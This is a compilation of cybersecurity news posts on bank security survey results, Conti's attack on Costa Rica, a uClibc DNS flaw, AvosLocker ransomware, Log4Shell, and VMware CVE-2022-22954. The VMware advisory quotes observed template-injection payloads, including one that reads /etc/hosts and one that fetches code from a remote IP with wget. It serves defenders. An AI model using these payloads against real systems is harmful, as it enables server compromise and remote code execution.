What's Changed for Cybersecurity in Banking and Finance: New Study

 

Description

Cybersecurity in financial services is a complex picture. Not only has a range of new tech hit the industry in the last 5 years, but compliance requirements introduce another layer of difficulty to the lives of infosec teams in this sector. To add to this picture, the overall cybersecurity landscape has rapidly transformed, with ransomware attacks picking up speed and high-profile vulnerabilities hitting the headlines at an alarming pace.

VMware recently released the 5th annual installment of their Modern Bank Heists report, and the results show a changing landscape for cybersecurity in banking and finance. Here’s a closer look at what CISOs and security leaders in finance said about the security challenges they’re facing — and what they’re doing to solve them.

Destructive threats and ransomware attacks on banks are increasing

The stakes for cybersecurity are higher than ever at financial institutions, as threat actors are increasingly using more vicious tactics. Banks have seen an uptick in destructive cyberattacks — those that delete data, damage hard drives, disrupt network connections, or otherwise leave a trail of digital wreckage in their wake.

63% of financial institutions surveyed in the VMware report said they’ve seen an increase in these destructive attacks targeting their organization — that’s 17% more than said the same in last year’s version of the report.

At the same time, finance hasn’t been spared from the rise in ransomware attacks, which have also become increasingly disruptive. Nearly 3 out of 4 respondents to the survey said they’d been hit by at least one ransomware attack. What’s more, 63% of those ended up paying the ransom.

Supply chain security: No fun in the sun

Like ransomware, island hopping is also on the rise — and while that might sound like something to do on a beach vacation, that’s likely the last thing the phrase brings to mind for security pros at today’s financial institutions.

IT Pro describes island hopping attacks as “the process of undermining a company’s cyber defenses by going after its vulnerable partner network, rather than launching a direct attack.” The source points to the high-profile data breach that rocked big-box retailer Target in 2017. Hackers found an entry point to the company’s data not through its own servers, but those of Fazio Mechanical Services, a third-party vendor.

In the years since the Target breach, supply chain cybersecurity has become an even greater area of focus for security pros across industries, thanks to incidents like the SolarWinds breach and large-scale vulnerabilities like Log4Shell that reveal just how many interdependencies are out there. Now, threats in the software supply chain are becoming more apparent by the day.

VMware’s study found that 60% of security leaders in finance have seen an increase in island hopping attacks — 58% more than said the same last year. The uptick in threats originating from partners’ systems is clearly keeping security officers up at night: 87% said they’re concerned about the security posture of the service providers they rely on.

The proliferation of mobile and web applications associated with the rise of financial technology (fintech) may be exacerbating the problem. VMware notes API attacks are one of the primary methods of island hopping — and they found a whopping 94% of financial-industry security leaders have experienced an API attack through a fintech application, while 58% said they’ve seen an increase in application security incidents overall.

How financial institutions are improving cybersecurity

With attacks growing more dangerous and more frequent, security leaders in finance are doubling down on their efforts to protect their organizations. The majority of companies surveyed in VMware’s study said they planned a 20% to 30% boost to their cybersecurity budget in 2022. But what types of solutions are they investing in with that added cash?

The number 1 security investment for CISOs this year is extended detection and response (XDR), with 24% listing this as their top priority. Closely following were workload security at 22%, mobile security at 21%, threat intelligence at 15%, and managed detection and response (MDR) at 11%. In addition, 51% said they’re investing in threat hunting to help them stay ahead of the attackers.

Today’s threat landscape has grown difficult to navigate — especially when financial institutions are competing for candidates in a tight cybersecurity talent market. In the meantime, the financial industry has only grown more competitive, and the pace of innovation is at an all-time high. Having powerful, flexible tools that can streamline and automate security processes is essential to keep up with change. For banks and finance organizations to attain the level of visibility they need to innovate while keeping their systems protected, these tools are crucial.

Additional reading:

• Cloud Security and Compliance: The Ultimate Frenemies of Financial Services
• The Future of Finserv Security: Cloud Expert and Former CISO Anthony Johnson Weighs In
• An Inside Look at CISA’s Supply Chain Task Force
• Update to GLBA Security Requirements for Financial Institutions

NEVER MISS A BLOG

Read More

Conti Ransomware Attack Spurs State of Emergency in Costa Rica

 

Description

Costa Rican President Rodrigo Chaves declared a state of national cybersecurity emergency over the weekend following a financially motivated Conti ransomware attack against his administration that has hamstrung the government and economy of the Latin American nation.

The attack—attributed to the prolific Conti ransomware group–occurred three weeks ago not long after Chaves took office; in fact, the state of emergency was one of his first decrees as president. The first government agency attacked was the Ministry of Finance, which has been without digital services since April 18, according to a published report.

Conti—a top-tier Russian-speaking ransomware group–is known as one of the most ruthless gangs in the game, with a take-no-prisoners approach specializing in double extortion, a method in which attackers threaten to expose stolen data or use it for future attacks if victims don’t pay by a deadline.

Conti acts on a ransomware-as-a-service (RaaS) model, with a vast network of affiliates and access brokers at its disposal to do its dirty work. The group also is known for targeting organizations for which attacks could have life-threatening consequences, such as hospitals, emergency number dispatch carriers, emergency medical services and law-enforcement agencies.

The attack on Costa Rica could be a sign of more Conti activity to come, as the group posted a message on their news site to the Costa Rican government that the attack is merely a “demo version.” The group also said the attack was solely motivated by financial gain as well as expressed general political disgust, another signal of more government-directed attacks.

Next-Level Incident

The incident demonstrates how a cyber-attack can potentially be as serious as a military action or a natural disaster especially when it affects a developing nation like Costa Rica, a security professional observed.

“Costa Rica’s state-of-emergency following an attack from Conti is an important rallying call to the rest of the world,” Silas Cutler, principal reverse engineer for security firm Stairwell, wrote in an e-mail to Threatpost. “While the emergency status may have a limited direct impact … it puts the severity of this breach into the same category as a natural disaster or military incident.”

The double-extortion aspect of not only Conti’s but also a number of other ransomware group’s methods also can embolden more ransomware attacks because most targeted organizations will pay rather than risk the leak of sensitive data—providing more incentive to threat actors, noted another security professional.

“It is a large reason why most victims are paying today,” observed Roger Grimes, data-driven defense evangelist for security firm KnowBe4, in an email to Threatpost.

Conti likely has every employee’s personal login credentials to any Costa Rican government site that they visited during the time the ransomware was active on the system before it locked files, which poses a big problem for citizens using government services online if Conti indeed has leaked the info, he said.

“If Costa Rica was hosting customer-facing websites in the compromised domains, like they likely were, their customers’ credentials–which are often reused on other sites and services the customers visit–are likely compromised, too,” Grimes said. “Not paying the ransom puts not only Costa Rica’s own services at risk, but those of their employees and customers.”

Indeed, last year the city of Tulsa, OK, put its citizens on alert for potential cyber fraud after Conti leaked some 18,000 city files, mostly police citations, on the dark web following a ransomware attack on the city’s government.

U.S. Offering Aid

To help prevent future attacks like the one on Costa Rica, the U.S. government said last week that it’s offering a hefty reward–up to $10 million–for information leading to the identification and/or location of any of Conti Group’s leaders. The U.S. also will offer up to $5 million for info that can lead to the arrest or conviction of anyone conspiring in a Conti ransomware attack.

To date, Conti has been responsible for hundreds of ransomware incidents over the past two years, with more than 1,000 victims paying more than $150 million to the group, according to the FBI. This gives Conti the dubious honor of being the costliest ransomware strain ever documented, according to the feds.

While authorities pursue Conti, governments can take a number of steps to prevent ransomware attacks, security professionals noted. One is to adopt a cultural change when it comes to cybersecurity, observed Chris Clements, vice president of solutions architecture at security firm Cerberus Sentinel.

Governments should shift their focus from the historic mentality of cyber-security as an “IT cost center” toward one that views it as “a culturally ingrained approach that identifies cybersecurity investment, both in tools and people, as a critical strategic defensive shield,’ he said in an email to Threatpost.

“Until this changes, the problem of cyber-attack is going to get worse before it gets any better,” Clements said in an email to Threatpost.

Governments also can take proactive steps such as conducting perimeter reviews as a means of mitigating some of the methods Conti-affiliated access brokers use to infiltrate systems, Cutler suggested. This can better secure their perimeters and allow them to react faster to attacks.

However, even this “will not fully prevent these types of attacks” given the network of affiliates and access brokers that RaaS groups like Conti have at its disposal to breach systems, he said.

Read More

Unpatched DNS Bug Puts Millions of Routers, IoT Devices at Risk

 

Description

An unpatched Domain Name System (DNS) bug in a popular standard C library can allow attackers to mount DNS poisoning attacks against millions of IoT devices and routers to potentially take control of them, researchers have found.

Researchers at Nozomi Networks Labs discovered the flaw affecting the implementation of DNS in all versions of uClibc and uClibc-ng, popular C standard libraries found in numerous IoT products, they revealed in a blog post this week.

“The flaw is caused by the predictability of transaction IDs included in the DNS requests generated by the library, which may allow attackers to perform DNS poisoning attacks against the target device,” Nozomi’s Giannis Tsaraias and Andrea Palanca wrote in the post.

In a DNS poisoning attack– also known as DNS spoofing and DNS cache poisoning–an attacker deceives a DNS client into accepting a forged response. This forces a program to perform network communications with an arbitrarily defined endpoint instead of the legitimate one.

Numerous Affected Devices

The scope of the flaw is vast, as major vendors such as Linksys, Netgear and Axis, as well as Linux distributions such as Embedded Gentoo, use uClibe in their devices. Meanwhile, uClibc-ng is a fork specifically designed for OpenWRT, a common OS for routers deployed throughout various critical infrastructure sectors, researchers said. Specific devices impacted by the bug were not disclosed as part of this research.

Moreover, if an attacker mounts a successful DNS poisoning attack on an affected device, they also can perform a subsequent man-in-the-middle attack, researchers said. This is because by poisoning DNS records, they can re-route network communications to a server under their control, researchers said.

“The attacker could then steal and/or manipulate information transmitted by users, and perform other attacks against those devices to completely compromise them,” researchers wrote. “The main issue here is how DNS poisoning attacks can force an authenticated response.”

Researchers are currently working with the maintainer of the uClibe library to develop a fix for the vulnerability, which leaves devices vulnerable, they said. Because of this, Nozomi researchers have declined to disclose specific details of the device on which they were able to reproduce the flaw to keep attackers at bay, they said.

DNS as a Target

News of the DNS vulnerability brings reminders of last year’s Log4Shell flaw, which sent ripples of concern within the cybersecurity community when it was discovered in December because of its scope. The flaw affects the ubiquitous open-source Apache Log4j framework—found in countless Java apps used across the internet. In fact, a recent report found that the flaw continues to put millions of Java apps at risk, though a patch exists for the flaw.

Though it affects a different set of targets, the DNS flaw also has a broad scope not only because of the devices it potentially affects, but also because of the inherent importance of DNS to any device connecting over IP, researchers said.

DNS is a hierarchical database that serves the integral purpose of translating a domain name into its related IP address. To distinguish the responses of different DNS requests aside from the usual 5-tuple–source IP, source port, destination IP, destination port, protocol–and the query, each DNS request includes a parameter called “transaction ID.”

The transaction ID is a unique number per request that is generated by the client and added in each request sent. It must be included in a DNS response to be accepted by the client as the valid one for request, researchers noted.

“Because of its relevance, DNS can be a valuable target for attackers,” they observed.

The Vulnerability and Exploitation

Researchers discovered the flaw while reviewing the trace of DNS requests performed by an IoT device, they said. They noticed something abnormal in the pattern of DNS requests from the output of Wireshark. The transaction ID of the request was at first incremental, then reset to the value 0x2, then was incremental again.

“While debugging the related executable, trying to understand the root cause, we eventually noticed that the code responsible for performing the DNS requests was not part of the instructions of the executable itself, but was part of the C standard library in use, namely uClibc 0.9.33.2,” they explained.

Researchers performed a source code review and found that the uClibc library implements DNS requests by calling the internal “__dns_lookup” function, which is located in the source file “/libc/inet/resolv.c.”

Eventually they found fault with some of the lines of code in the library—specifically line #1240, #1260, #1309, #1321 and #1335, to which they could attribute the anomaly in the DNS request pattern, which makes the transaction ID predictable, researchers said.

This predictability creates a scenario in which an an attacker would need to craft a DNS response that contains the correct source port, as well as win the race against the legitimate DNS response incoming from the DNS server to exploit the flaw, researchers said.

“It is likely that the issue can easily be exploited in a reliable way if the operating system is configured to use a fixed or predictable source port,” they explained.

To exploit the flaw also depends on how an OS applies randomization of source port, which means an attacker would have to bruteforce the 16-bit source port value by sending multiple DNS responses, while simultaneously beating the legitimate DNS response, researchers added.

Mitigation

Researchers explained, because the bug remains patched on millions of IoT devices, it is not disclosing the specific devices vulnerable to attack. In the interim, Nozomi Networks recommends that network administrators increase their network visibility and security in both IT and Operational Technology environments.

“This vulnerability remains unpatched, however we are working with the maintainer of the library and the broader community in support of finding a solution,” they wrote.

Read More

AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection

 

Description

Cybersecurity researchers have disclosed a new variant of the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws.

“This is the first sample we observed from the U.S. with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys),” Trend Micro researchers, Christoper Ordonez and Alvin Nieto, said in a Monday analysis.

“In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability (Log4shell) using Nmap NSE script.”

AvosLocker, one of the newer ransomware families to fill the vacuum left by REvil, has been linked to a number of attacks that targeted critical infrastructure in the U.S., including financial services and government facilities.

A ransomware-as-a-service (RaaS) affiliate-based group first spotted in July 2021, AvosLocker goes beyond double extortion by auctioning data stolen from victims should the targeted entities refuse to pay the ransom.

Other targeted victims claimed by the ransomware cartel are said to be located in Syria, Saudi Arabia, Germany, Spain, Belgium, Turkey, the U.A.E., the U.K., Canada, China, and Taiwan, according to an advisory released by the U.S. Federal Bureau of Investigation (FBI) in March 2022.

Telemetry data gathered by Trend Micro shows that the food and beverage sector was the most hit industry between July 1, 2021 and February 28, 2022, followed by technology, finance, telecom, and media verticals.

The entry point for the attack is believed to have been facilitated by leveraging an exploit for a remote code execution flaw in Zoho’s ManageEngine ADSelfService Plus software (CVE-2021-40539) to run an HTML application (HTA) hosted on a remote server.

“The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the [command-and-control] server to execute arbitrary commands,” the researchers explained.

This includes retrieving an ASPX web shell from the server as well as an installer for the AnyDesk remote desktop software, the latter of which is used to deploy additional tools to scan the local network, terminate security software, and drop the ransomware payload.

Some of the components copied to the infected endpoint are a Nmap script to scan the network for the Log4Shell remote code execution flaw (CVE-2021-44228) and a mass deployment tool called PDQ to deliver a malicious batch script to multiple endpoints.

The batch script, for its part, is equipped with a wide range of capabilities that allows it to disable Windows Update, Windows Defender, and Windows Error Recovery, in addition to preventing safe boot execution of security products, creating a new admin account, and launching the ransomware binary.

Also used is aswArPot.sys, a legitimate Avast anti-rootkit driver, to kill processes associated with different security solutions by weaponizing a now-fixed vulnerability in the driver the Czech company resolved in June 2021.

“The decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege),” the researchers pointed out. “This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice.”

Read More

Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954

 

Description

On April 6, 2022, VMware published VMSA-2022-0011, which detailed multiple security vulnerabilities. The most severe of these is CVE-2022-22954, a critical remote code execution vulnerability affecting VMware’s Workspace ONE Access and Identity Manager solutions. The vulnerability arises from a server-side template injection flaw and has a CVSSv3 base score of 9.8. Successful exploitation allows an unauthenticated attacker with network access to the web interface to execute an arbitrary shell command as the VMware user.

Rapid7’s vulnerability research team has a full analysis of CVE-2022-22954 in AttackerKB, including chaining the vulnerability with CVE-2022-22960 to escalate to root.

Affected products:

• VMware Workspace ONE Access (Access) 20.10.0.0 - 20.10.0.1, 21.08.0.0 - 21.08.0.1
• VMware Identity Manager (vIDM) 3.3.3 - 3.3.6

VMware updated their advisory to note active exploitation in the wild on April 12, 2022; a day later, security news outlet Bleeping Computer indicated that several public proof-of-concept exploits were being used in the wild to drop coin miners on vulnerable systems. More recently, security firm Morphisec published analysis of attacks that exploited CVE-2022-22954 to deploy reverse HTTPS backdoors. Public proof-of-concept exploit code is available and fits in a tweet (credit to researchers wvu and Udhaya Prakash).

Rapid7’s Project Heisenberg detected scanning/exploitation activity on 2022-04-13 and again on 2022-04-22. A total of 14 requests were observed across ports 80, 98, 443, 4443.

Scanning/exploitation strings observed:

• /catalog-portal/ui/oauth/verify
• /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")}
• /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("wget -U "Hello 1.0" -qO - http://106[.]246[.]224[.]219/one")}

Attacker IP addresses:
103[.]42[.]196[.]67
5[.]157[.]38[.]50
54[.]38[.]103[.]1 (NOTE: according to this French government website, this IP address is benign)
94[.]74[.]123[.]228
96[.]243[.]27[.]61
107[.]174[.]218[.]172
170[.]210[.]45[.]163
173[.]212[.]229[.]216

These nodes appear to be members of generic botnets. Rapid7’s Heisenberg network has observed many of them involved in the same campaigns as noted in the above graphic, as well as Log4Shell exploitation attempts.

Mitigation guidance

VMware customers should patch their Workspace ONE Access and Identity Manager installations immediately, without waiting for a regular patch cycle to occur. VMware has instructions here on patching and applying workarounds. VMware has an FAQ available on this advisory here.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2022-22954 with an authenticated vulnerability check for Unix-like systems. (Note that VMware Workspace ONE Access is only able to be deployed on Linux from 20.x onward.)

InsightIDR customers have a new detection rule added to their library to identify attacks related to this vulnerability. We recommend that you review your settings for this detection rule and confirm it is turned on and set to an appropriate rule action and priority for your organization:

• Suspicious Process - VMware Workspace ONE Access Launches Process

For our MDR service customers, Rapid7 detection logic is continuously reviewed to ensure detections are based on any observed attacker behavior seen by our Incident Response (IR), Managed Detection and Response (MDR), and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration and threat landscape monitoring, we ensure product coverage for the latest techniques being used by malicious actors and will make updates as necessary. The MDR team will notify you if suspicious activity is detected in your environment.

NEVER MISS A BLOG

Read More

U.S. Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities

 

Description

Log4Shell, ProxyShell, ProxyLogon, ZeroLogon, and flaws in Zoho ManageEngine AD SelfService Plus, Atlassian Confluence, and VMware vSphere Client emerged as some of the top exploited security vulnerabilities in 2021.

That’s according to a "Top Routinely Exploited Vulnerabilities" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S.

Other frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server (CVE-2020-0688), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure (CVE-2019-11510), and a path traversal defect in Fortinet FortiOS and FortiProxy (CVE-2018-13379).

Nine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws.

“Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities,” the agencies said in a joint advisory.

“For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability’s disclosure, likely facilitating exploitation by a broader range of malicious actors.”

To mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies are recommending organizations to apply patches in a timely fashion and implement a centralized patch management system.

Read More

Millions of Java Apps Remain Vulnerable to Log4Shell

 

Description

Four months after the discovery of the zero-day Log4Shell critical flaw, millions of Java applications still remain vulnerable to compromise, researchers have found.

Rezilion expected that due to the “massive amount of media coverage” the bug unsurprisingly received, the majority of applications would already be patched, Head of Vulnerability Research Yotam Perkal wrote in a report published Tuesday. However, their analysis found a very different story, he said.

“We learned that the landscape is far from ideal and many applications vulnerable to Log4Shell still exist in the wild,” Perkal wrote in the report.

Supporting Evidence

Researchers did a search on the Shodan search engine to see how many apps vulnerable to Log4Shell are exposed to the internet. They identified 90,000 potential vulnerable internet-facing applications, which they believe “is just the tip of the iceberg in terms of the actual vulnerable attack surface,” Perkal wrote.

Researchers divided the apps into three categories; the first two are containers that in their latest version, still contain obsolete versions of Log4j; and containers that while their latest version is up-to-date yet still show evidence of using previous versions.

The third category are publicly facing servers of the world’s favorite internet game Minecraft, which highlight the risks with outdated proprietary software, researchers noted… Indeed, it Minecraft sites where the vulnerability first turned up and apparently still persists.

Researchers cited other sources for further proof that the Log4Shell attack surface remains vast. One was the Google service Open Source Insights, which scans millions of open-source packages. The service found that out of a total of 17,840 packages affected by the flaw, only 7,140 were patched, making nearly 60 percent still vulnerable.

Moreover many applications are still using Log4J version 1.x and likely aren’t patched because the original Log4Shell vulnerability, tracked as CVE-201-44228, doesn’t apply to this version, researchers noted.

However, this is a misconception as that version has been “in an end-of-life state since August 2015 (which means it does not get any security updates), and contains plenty of other vulnerabilities, including RCE vulnerabilities, Perkal noted.

“This should definitely worry organizations that are still using it,” he wrote.

Under Active Exploitation

Perhaps most worrying about the vulnerable attack surface is that Log4Shell remains a hot target for threat actors, researchers noted. Indeed, attackers immediately set upon the bug once it was discovered—already under active exploitation—and haven’t let up much since.

While Apache released a patch for Log4Shell within a day of discovery, it, too, had issues that could lead to DoS attacks—and apparently still hasn’t been applied in many cases.

Initial attempts to exploit the bug in the wild were aimed at ransomware deployment and coin miners; however, as time when on APT groups joined the fray and began pummeling the flaw in earnest, researchers said.

Most recently, active exploitation of Log4Shell has been linked to the Chinese APT 41 group and Deep Panda, Perkal said. Before that, the Chinese state-sponsored espionage group HAFNIUM and Iranian-backed groups APT35 (aka Newscaster) and Tunnel Vision also targeted the flaw.

Currently there are still dozens of recorded daily exploitation attempts of Log4Shell, according to a honeypot set up by the SANS Internet Storm Center, researchers noted.

Read More